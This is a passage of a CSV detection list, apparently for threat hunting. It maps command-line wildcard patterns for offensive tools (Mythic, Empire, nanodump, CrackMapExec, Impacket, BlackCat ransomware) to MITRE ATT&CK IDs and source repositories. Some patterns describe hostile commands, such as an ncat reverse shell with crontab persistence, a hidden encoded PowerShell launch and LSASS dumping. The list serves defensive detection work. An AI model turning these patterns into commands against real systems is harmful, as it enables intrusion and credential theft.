mythic_container.Mythic*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","0","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"* mythic_payloadtype_container*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","0","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"* mythic-cli*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","0","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" +"* -n *TotallyLegitTool*","offensive_tool_keyword","InvisibilityCloak","Proof-of-concept obfuscation toolkit for C# post-exploitation tools","T1027 - T1059.003 - T1140 - T1107","TA0004 - TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/h4wkst3r/InvisibilityCloak","1","0","N/A","N/A","4","375","147","2022-07-22T14:13:53Z","2021-05-19T14:19:49Z" +"* --name covenant *","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"* nanodump*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. 
A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" +"* nanodump/*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" +"* nat-pmp-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* nat-pmp-mapport.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* nbd-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* -NBNSBruteForce*","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","0","N/A","10","10","2212","441","2023-06-13T01:36:42Z","2015-04-02T18:04:41Z" +"* nbns-interfaces.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* -NBNSTTL *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* nbstat.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* ncat * -e /bin/bash*|crontab*","greyware_tool_keyword","ncat","reverse shell persistence","T1059.004 - T1053.005 - T1059.005","TA0002 - TA0005","N/A","N/A","Persistence","N/A","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A"
+"* ncp-enum-users.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* ncp-serverinfo.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* ndmp-fs-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* ndmp-version.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* --neo4j-host *--neo4j-port*","offensive_tool_keyword","sprayhound","Password spraying tool and Bloodhound integration","T1110.003 - T1210.001 - T1069.002","TA0006 - TA0007 - TA0003","N/A","N/A","Credential Access","https://github.com/Hackndo/sprayhound","1","0","N/A","N/A","2","136","12","2023-02-15T11:26:53Z","2020-02-06T17:45:37Z"
+"* nessus-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* nessus-xmlrpc-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* netbus-auth-bypass.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* netbus-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* netbus-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* netbus-version.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* --netcat-port *","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. 
utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","0","N/A","10","10","3255","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z"
+"* netripper*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z"
+"* netscan.exe *","greyware_tool_keyword","softperfect networkscanner","SoftPerfect Network Scanner can ping computers scan ports discover shared folders and retrieve practically any information about network devices via WMI SNMP HTTP SSH and PowerShell","T1046 - T1065 - T1135 ","TA0007 ","N/A","N/A","Discovery","https://www.softperfect.com/products/networkscanner/","1","0","N/A","8","10","N/A","N/A","N/A","N/A"
+"* --NewCertPath *.pfx --NewCertPassword *","offensive_tool_keyword","ForgeCert","ForgeCert uses the BouncyCastle C# API and a stolen Certificate Authority (CA) certificate + private key to forge certificates for arbitrary users capable of authentication to Active Directory.","T1553.002 - T1136.003 - T1059.001","TA0006 - TA0002","N/A","N/A","Defense Evasion","https://github.com/GhostPack/ForgeCert","1","0","N/A","10","6","538","87","2022-10-07T18:18:09Z","2021-06-09T22:04:18Z"
+"* 
NewLocalAdmin(*","offensive_tool_keyword","SharpGPOAbuse","SharpGPOAbuse is a .NET application written in C# that can be used to take advantage of a user's edit rights on a Group Policy Object (GPO) in order to compromise the objects that are controlled by that GPO.","T1546.008 - T1204 - T1134 ","TA0007 - TA0008 - TA0003 - TA0004 ","N/A","N/A","Defense Evasion","https://github.com/FSecureLABS/SharpGPOAbuse","1","0","N/A","N/A","9","855","130","2020-12-15T14:48:31Z","2019-04-01T12:10:25Z"
+"* nexpose-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* nfs-ls.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* nfs-showmount.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* nfs-statfs.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* --nicehash *--coin *","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z"
+"* nikto.pl *","offensive_tool_keyword","nikto","Nikto web server scanner","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/sullo/nikto","1","1","N/A","N/A","10","7136","1096","2023-09-18T14:44:28Z","2012-11-24T04:24:29Z"
+"* nimcrypt*","offensive_tool_keyword","nimcrypt","Nimcrypt is a .NET PE Crypter written in Nim based entirely on the work of @byt3bl33d3r's OffensiveNim project","T1027 - T1055 - T1099 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/icyguider/nimcrypt","1","0","N/A","N/A","1","83","5","2021-03-25T00:27:12Z","2021-03-24T17:51:52Z"
+"* Ninja.py*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","0","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z"
+"* nje-node-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* nje-pass-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* --nla-redirection-host * --nla-redirection-port *","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1296","235","2023-07-28T14:33:09Z","2018-09-07T19:17:41Z"
+"* nntp-ntlm-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* -NoBase64 *","offensive_tool_keyword","empire","empire agent.ps1 arguments.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1061","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"* --no-bruteforce *","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z"
+"* --no-bruteforce --continue-on-success*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential 
Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
+"* --no-http-server -smb2support -t * -c *","offensive_tool_keyword","AD exploitation cheat sheet","Example command to relay the hash to authenticate as local admin (if the service account has these privileges) and run calc.exe. Omit the -c parameter to attempt a secretsdump instead.","T1550 - T1555 - T1212 - T1558","N/A","N/A","N/A","Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* --nomain -d:exportDll --passL:*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z"
+"* --no-net*","offensive_tool_keyword","blackcat ransomware","BlackCat Ransomware behavior","T1486.001 - T1489 - T1490 - T1486","TA0011 - TA0010 - TA0012 - TA0007 - TA0040","blackcat ransomware","N/A","Ransomware","https://www.sentinelone.com/labs/blackcat-ransomware-highly-configurable-rust-driven-raas-on-the-prowl-for-victims/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* -NoP -sta -NonI -W Hidden -Enc *","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 
- T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z"
+"* -no-pass -dns-tcp -nameserver*","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","0","N/A","10","10","1766","244","2023-09-26T00:51:47Z","2021-10-06T23:02:40Z"
+"* -no-pass -just-dc-user *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z"
+"* -no-pass rid-hijack*","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in lateral movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Network Exploitation tools","https://github.com/XiaoliChan/wmiexec-Pro","1","0","N/A","N/A","8","790","98","2023-07-31T03:58:14Z","2023-04-04T06:24:07Z"
+"* -no-pass -usersfile *","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working 
with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z"
+"* NoPowerShell.*","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z"
+"* No-PowerShell.cs*","offensive_tool_keyword","No-powershell","powershell script to C# (no-powershell)","T1059.001 - T1027 - T1500","TA0002 - TA0004 - 
TA0005","N/A","N/A","Defense Evasion","https://github.com/gtworek/PSBits/blob/master/Misc/No-PowerShell.cs","1","0","N/A","8","10","2670","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z"
+"* --no-ppid-spoof*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10",,"N/A",,,
+"* -no-preauth * -dc-ip *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z"
+"* -NoPRo -wIN 1 -nONi -eN Sh33L*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","0","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z"
+"* --no-prop*","offensive_tool_keyword","blackcat ransomware","BlackCat Ransomware behavior","T1486.001 - T1489 - T1490 - T1486","TA0011 - TA0010 - TA0012 - TA0007 - TA0040","blackcat ransomware","N/A","Ransomware","https://www.sentinelone.com/labs/blackcat-ransomware-highly-configurable-rust-driven-raas-on-the-prowl-for-victims/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* --no-prop-servers*","offensive_tool_keyword","blackcat ransomware","BlackCat Ransomware behavior","T1486.001 - T1489 - T1490 - T1486","TA0011 - TA0010 - TA0012 - TA0007 - TA0040","blackcat 
